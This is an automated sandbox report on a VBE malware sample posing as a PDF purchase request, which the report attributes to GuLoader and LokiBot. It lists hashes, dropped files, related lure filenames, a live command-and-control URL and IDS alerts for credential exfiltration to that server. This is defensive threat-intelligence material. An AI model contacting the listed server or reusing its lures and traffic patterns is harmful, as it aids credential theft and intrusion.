                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                [Behavior graph. ID: 1523160; Sample: PRORA#U010cUNSKA ZAHTEVA 09...; Startdate: 01/10/2024; Architecture: WINDOWS; Score: 100]

                Source | Detection | Scanner | Label
                PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe | 16% | ReversingLabs | Script.Trojan.Heuristic
                PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe | 13% | Virustotal |

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | ReversingLabs |
                C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | Virustotal |

                No Antivirus matches

                Source | Detection | Scanner | Label
                drive.google.com | 0% | Virustotal |
                drive.usercontent.google.com | 1% | Virustotal |

                Source | Detection | Scanner | Label
                http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                https://go.micro | 0% | URL Reputation | safe
                https://contoso.com/License | 0% | URL Reputation | safe
                https://contoso.com/Icon | 0% | URL Reputation | safe
                https://contoso.com/ | 0% | URL Reputation | safe
                https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                https://aka.ms/pscore68 | 0% | URL Reputation | safe
                https://apis.google.com | 0% | URL Reputation | safe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
                https://wordpress.org/documentation/article/faq-troubleshooting/ | 0% | Virustotal |
                https://drive.usercontent.google.com/ | 1% | Virustotal |
                http://drive.usercontent.google.com | 1% | Virustotal |
                https://github.com/Pester/Pester | 1% | Virustotal |
                https://www.google.com | 0% | Virustotal |
                http://137.184.191.215/index.php/check.php?id=1 | 15% | Virustotal |
                https://drive.usercontent.google.com | 1% | Virustotal |
                https://drive.google.com | 0% | Virustotal |
                https://drive.google.com/- | 1% | Virustotal |
                http://drive.google.com | 0% | Virustotal |
                https://drive.google.com/ | 0% | Virustotal |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                drive.google.com | 142.250.184.238 | true | false | | unknown
                drive.usercontent.google.com | 142.250.184.193 | true | false | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://137.184.191.215/index.php/check.php?id=1 | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://nuget.org/NuGet.exe | powershell.exe | false | URL Reputation: safe | unknown
                http://drive.usercontent.google.com | powershell.exe | false | | unknown
                http://pesterbdd.com/images/Pester.png | powershell.exe | false | URL Reputation: safe | unknown
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | unknown
                https://go.micro | powershell.exe | false | URL Reputation: safe | unknown
                https://contoso.com/License | powershell.exe | false | URL Reputation: safe | unknown
                https://contoso.com/Icon | powershell.exe | false | URL Reputation: safe | unknown
                https://drive.googP | powershell.exe | false | | unknown
                https://wordpress.org/documentation/article/faq-troubleshooting/ | dxdiag.exe | false | | unknown
                https://drive.usercontent.google.com/ | dxdiag.exe | false | | unknown
                http://drive.google.com | powershell.exe | false | | unknown
                https://drive.usercontent.googh8 | powershell.exe | false | | unknown
                https://aka.ms/pscore6lBsq | powershell.exe | false | | unknown
                https://github.com/Pester/Pester | powershell.exe | false | | unknown
                https://www.google.com | powershell.exe, dxdiag.exe | false | | unknown
                https://drive.google.com/ | dxdiag.exe | false | | unknown
                https://contoso.com/ | powershell.exe | false | URL Reputation: safe | unknown
                https://nuget.org/nuget.exe | powershell.exe | false | URL Reputation: safe | unknown
                https://drive.google.com | powershell.exe | false | | unknown
                https://drive.usercontent.google.com | powershell.exe | false | | unknown
                https://drive.google.com/- | dxdiag.exe | false | | unknown
                https://aka.ms/pscore68 | powershell.exe | false | URL Reputation: safe | unknown
                https://apis.google.com | powershell.exe, dxdiag.exe | false | URL Reputation: safe | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | URL Reputation: safe | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      142.250.184.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                      137.184.191.215 | unknown | United States | 11003 | PANDGUS | true
                      142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523160
                      Start date and time:2024-10-01 07:45:28 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
                      renamed because original name is a hash value
                      Original Sample Name:PRORAUNSKA ZAHTEVA 09-30-2024pdf.vbe
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winVBE@30/10@2/3
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 87%
                      • Number of executed functions: 66
                      • Number of non-executed functions: 11
                      Cookbook Comments:
                      • Found application associated with file extension: .vbe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target dxdiag.exe, PID 2072 because there are no executed functions
                      • Execution Graph export aborted for target powershell.exe, PID 3032 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 6412 because it is empty
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      Time | Type | Description
                      01:46:22 | API Interceptor | 91x Sleep call for process: powershell.exe modified
                      01:47:09 | API Interceptor | 27x Sleep call for process: dxdiag.exe modified
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      137.184.191.215 | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/10899
                       | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw
                       | Bnnebgers.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/039
                       | PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw
                       | Happy Fiestas Patrias#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw
                       | B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/10899
                       | ____.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/039
                       | DIR-A_FB09948533#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/10899
                       | INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check.php?s=am9ntjjw
                       | #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215/index.php/check?post=073989953
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      PANDGUS | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | Bnnebgers.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elf | malicious | Mirai | 155.120.253.229
                       | PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe | malicious | GuLoader, Lokibot | 137.184.191.215
                       | Happy Fiestas Patrias#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | ____.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | DIR-A_FB09948533#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 137.184.191.215
                       | https://forms.office.com/Pages/ShareFormPage.aspx?id=atlxJ-ZfTkmpiBz5GOrQZra6YH8IF9tJvDnK9FEosBRUNUoySTNMSlhENTkyTjRFS0pYUFBWREJDVS4u&sharetoken=VjI7W44Fh45blPkj2SeD | malicious | HTMLPhisher | 137.184.252.128
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      3b5074b1b5d032e5620f69f9f700ff0e | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 142.250.184.193, 142.250.184.238
                       | Scanned Purchase List.vbs | malicious | Unknown | 142.250.184.193, 142.250.184.238
                       | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 142.250.184.193, 142.250.184.238
                       | Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 142.250.184.193, 142.250.184.238
                       | mtgjyX9gHF.exe | malicious | Quasar | 142.250.184.193, 142.250.184.238
                       | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 142.250.184.193, 142.250.184.238
                       | 2zYP8qOYmJ.exe | malicious | Unknown | 142.250.184.193, 142.250.184.238
                       | RFQ-00032035.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.193, 142.250.184.238
                       | RFQ -SCHOTTEL Type SRP200.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.193, 142.250.184.238
                       | Purchase Order 007823-PO# 005307.exe | malicious | Snake Keylogger, VIP Keylogger | 142.250.184.193, 142.250.184.238
                      37f463bf4616ecd445d4a1937da06e19 | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 142.250.184.193, 142.250.184.238
                       | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 142.250.184.193, 142.250.184.238
                       | Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 142.250.184.193, 142.250.184.238
                       | 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 142.250.184.193, 142.250.184.238
                       | hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar | 142.250.184.193, 142.250.184.238
                       | N83LFtMTUS.exe | malicious | LummaC, Stealc, Vidar | 142.250.184.193, 142.250.184.238
                       | Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exe | malicious | Remcos, GuLoader | 142.250.184.193, 142.250.184.238
                       | file.exe | malicious | LodaRAT | 142.250.184.193, 142.250.184.238
                       | file.exe | malicious | XWorm, Xmrig | 142.250.184.193, 142.250.184.238
                       | Payment Advice Note_Pdf.exe | malicious | Azorult, GuLoader | 142.250.184.193, 142.250.184.238
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      C:\Users\user\AppData\Roaming\188E93\31437F.exe | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot |
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):8003
                        Entropy (8bit):4.840877972214509
                        Encrypted:false
                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                        MD5:106D01F562D751E62B702803895E93E0
                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                        Malicious:false
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:Nlllulbnolz:NllUc
                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                        Malicious:false
                        Preview:@...e................................................@..........
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\dxdiag.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):222720
                        Entropy (8bit):5.934092890012391
                        Encrypted:false
                        SSDEEP:3072:MMlaJEzHyusOl081O6Zdtx7SNchIarfvdNpNXXR2P9K:k0HF/1l9lhIabdNpNMP
                        MD5:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        SHA1:B65ED4B4B1FB9CC5C128EE48A0B7CD326BA3AC93
                        SHA-256:C36C36C2945802FEB2195AD271C98F994B22A09F6CF2A1764A190865D1D6CE2B
                        SHA-512:7C4CC31303C59903E74B29B6EC14138611567A09281A4728D2B2A9B170E14344395173C1D97DF34B2F0391BC7365AC856884643C857325C3EA293AEF643C53E7
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 0%, Browse
                        Joe Sandbox View:
                        • Filename: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs, Detection: malicious, Browse
                        Process:C:\Windows\SysWOW64\dxdiag.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):453852
                        Entropy (8bit):5.973220528496078
                        Encrypted:false
                        SSDEEP:6144:zL1MpG+9CZNDUbTy5RHEMwRiLMJFQ9E/oyAMtAX8dSPU+WAtamERSk4TekNM5A:zSCTUbTyDEiMvQu/odM8EkSAtQRSMW
                        MD5:AEA8E7EFE3BDC3CB31B936D38D0453D7
                        SHA1:AE85CF7B5691A9E873F92BCA97AA1A3E0A1CE13A
                        SHA-256:583DD45F990D328F7E7B098A3215ED9E765CB4456346BB67ADFF0D9007AF88A7
                        SHA-512:DD8962BF1E8DD6C2DECBAA97E2B2165DE542EA02E1FF8727031B038C0318813C955C8A24437E44CCC87C17F7D7EC543DD1A5F719CB9C709E34F40004F70F6F64
                        Malicious:false
                        Process:C:\Windows\SysWOW64\dxdiag.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47
                        Entropy (8bit):1.168829563685559
                        Encrypted:false
                        SSDEEP:3:/lSll2DQi:AoMi
                        MD5:DAB633BEBCCE13575989DCFA4E2203D6
                        SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                        SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                        SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                        Malicious:false
                        Preview:........................................user.
                        File type:ASCII text, with CRLF line terminators
                        Entropy (8bit):4.88802523352518
                        TrID:
                        • Visual Basic Script (13500/0) 100.00%
                        File name:PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
                        File size:74'801 bytes
                        MD5:ae06697b71084618bb9a2d051f6fad2f
                        SHA1:d3cc11739d47aebc183e425750d53ea0d412c8e0
                        SHA256:dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac
                        SHA512:ea85577950701655694c970ac44a9f80ccca80f59166d0955d946570493b374f364c9fafefd548af04b8d5ebb6d494be64b840fdb55df00070b84bd4ef5dff34
                        SSDEEP:1536:sM0x6oY5kcFA/RYq0KkFV8N+FhhxGEoU5J/Gbrf:sM0xlYAJYJFFhhFo9f
                        TLSH:EE733C11DBD73F3E8D4623DDB94905F78D7A81F8713580FCA58D862A3022A78DA7E264
                        File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                        Icon Hash:68d69b8f86ab9a86
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-01T07:46:57.524026+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49713 | 142.250.184.238 | 443 | TCP
                        2024-10-01T07:47:02.251203+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49715 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:02.251203+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49715 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:04.843116+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.5 | 49715 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:04.932136+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:04.932136+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:07.607129+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:07.728144+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:07.728144+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:10.358161+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:10.515717+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:10.515717+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:13.404925+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:13.564544+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:13.564544+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:16.115599+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:16.278702+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:16.278702+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:18.943117+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:19.097881+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:19.097881+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:21.708727+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:21.877834+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:21.877834+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:24.486909+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:24.642067+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:24.642067+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:27.345096+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:27.499223+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:27.499223+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:30.154608+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:30.316653+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:30.316653+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:32.878745+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:33.034241+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:33.034241+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:35.676257+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:35.829673+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:35.829673+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:38.454235+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:38.621072+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:38.621072+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:41.422964+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:41.697900+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:41.697900+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:44.201081+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:44.372628+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:44.372628+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:46.917412+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
